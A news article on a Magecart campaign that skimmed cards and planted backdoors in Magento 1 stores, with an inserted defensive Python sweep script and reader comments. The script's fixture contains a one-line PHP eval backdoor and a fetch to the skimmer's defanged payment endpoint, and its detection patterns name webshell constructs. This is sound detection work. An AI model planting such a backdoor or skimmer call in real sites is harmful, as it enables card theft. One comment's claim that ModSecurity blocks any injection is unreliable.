Magecart skimmed credit card info and created multiple backdoors in hundreds of e-commerce...

Cal Jeffrey

In a nutshell: Magecart has struck again, and e-commerce sites are in a terrible pickle this time. The hacking groups have hit online businesses with malware intended to skim customer transaction information, which is nothing new. What is new is that the malicious code also opened at least 19 backdoors in the stores so that if admins remove it, hackers can quickly get back into the site.

Security researchers at Sansec say that they discovered that more than 500 online stores running the Magento 1 e-commerce platform were compromised in January. The hackers used a combination of SQL injection (SQLi) and PHP Object Injection (POI) to take over the Magento platform. Then a domain called "naturalfreshmall" served the malware to the now vulnerable sites.

"The Natural Fresh skimmer shows a fake payment popup, defeating the security of a (PCI compliant) hosted payment form," Sansec tweeted. "Payments are sent to https://naturalfreshmall[.]com/payment/Payment.php."

With control over Magento, gained specifically through a plugin called "Quickview," Magecart executed a man-in-the-middle attack: malware posing as a payment popup skimmed transaction data and sent it to Magecart-controlled servers.

Furthermore, the malicious payload contained files that created at least 19 backdoors to the websites. So removing the malware is not an effective mitigation. Administrators must first identify and remove all of the backdoors and then patch the compromised CMS.
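The article's operational point is that removing the visible skimmer is not enough: every dropped backdoor has to be found before the store is patched. The script below is an added illustration, not code from the article or from Sansec, of the kind of post-compromise sweep an administrator might run over a Magento 1 web root. It flags files that reference the skimmer domain named in the article, PHP files sitting in directories that should only hold static content, and PHP files containing common webshell-style constructs. The directory list, the regex heuristics and the sample files (including the `js/quickview/` path) are constructed assumptions for the demo; the heuristics are deliberately simple and will not catch every backdoor.

```python
"""Post-compromise sweep of a Magento 1 web root (added example, not from
the article or Sansec). Heuristics and fixture files are constructed."""
import os
import re
import tempfile

# Domain named in the article; any file referencing it deserves a look.
SKIMMER_DOMAIN = b"naturalfreshmall"

# Assumption: these Magento 1 directories should never contain executable PHP.
NO_PHP_DIRS = ("media", "var", "skin", "js")

# Constructed webshell indicators; a real sweep would use a fuller, maintained list.
SUSPECT_PATTERNS = [
    re.compile(rb"eval\s*\(\s*base64_decode"),            # eval(base64_decode(...))
    re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*\("),  # $_GET['x'](...) variable call
    re.compile(rb"(assert|preg_replace)\s*\([^)]*\$_(GET|POST|REQUEST)"),
]


def scan_file(root, path):
    """Return a list of (finding_kind, relative_path) tuples for one file."""
    findings = []
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    with open(path, "rb") as fh:
        data = fh.read()

    if SKIMMER_DOMAIN in data:
        findings.append(("skimmer-domain", rel))

    if rel.endswith((".php", ".phtml")):
        if rel.split("/")[0] in NO_PHP_DIRS:
            findings.append(("php-in-static-dir", rel))
        if any(p.search(data) for p in SUSPECT_PATTERNS):
            findings.append(("webshell-pattern", rel))
    return findings


def sweep(root):
    """Walk the web root and collect every finding, sorted for stable output."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            findings.extend(scan_file(root, os.path.join(dirpath, name)))
    return sorted(findings)


def build_sample_store(base):
    """Write a constructed fixture: clean core files, a skimmer include and a dropped backdoor."""
    files = {
        "index.php": b"<?php require 'app/Mage.php'; Mage::run();\n",
        "app/code/local/Ok/Module/Helper.php": b"<?php class Ok_Module_Helper {}\n",
        # Constructed: client-side loader pointing at the skimmer's payment endpoint (defanged).
        "js/quickview/checkout.js": b"fetch('https://naturalfreshmall[.]com/payment/Payment.php');\n",
        # Constructed: PHP backdoor hidden among product image cache files.
        "media/catalog/product/cache.php": b"<?php eval(base64_decode($_POST['q']));\n",
    }
    for rel, content in files.items():
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)


def demo():
    """Build the fixture in a temp dir and return the sweep's findings."""
    base = tempfile.mkdtemp(prefix="magento1_")
    build_sample_store(base)
    return sweep(base)


if __name__ == "__main__":
    for kind, rel in demo():
        print(f"{kind:20s} {rel}")
```

Running it prints three findings: the backdoor in `media/` is flagged twice (wrong location and webshell pattern), and the JavaScript loader is flagged for the skimmer domain. In practice the output is a starting point for manual review, and the store should only be patched once every flagged file has been examined and the backdoors removed.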

Sansec says the vulnerability lies in a deprecated version of the Magento 1 software from 2020. To patch their payment platforms, admins need to upgrade to the newest version of Adobe Commerce or use the Magento 1 patches that they can download from the OpenMage project.

Here's an obvious case of the seller not keeping up with the times and endangering all their customers. They need to be held directly responsible for every loss attributed to their negligence!
Here's an obvious case of the seller not keeping up with the times and endangering all their customers. They need to be held directly responsible for every loss attributed to their negligence!

Perhaps a seller isn't fully aware of the dangers of running an outdated CMS. Or the costs to maintain it are just too high for its purpose. I mean, what good is running a shop with approx. 1500 in maintenance costs a year if the revenue is not even passing that?

2nd: credit cards are the safest. You see a transaction you didn't commit? You can return it.

Servers need to be patched up. Tip: if you're on Apache / Litespeed, use Mod Security with the OWASP ruleset. That will block any potential injection such as SQL, PHP or XSS, and you can completely fine-tune what is being submitted to your website.

Because of that, I actually do run a very outdated website that is getting attacked on a daily basis but is safe because of that! So even if you have an outdated website (it's not recommended) you still have a last resort which works perfectly well.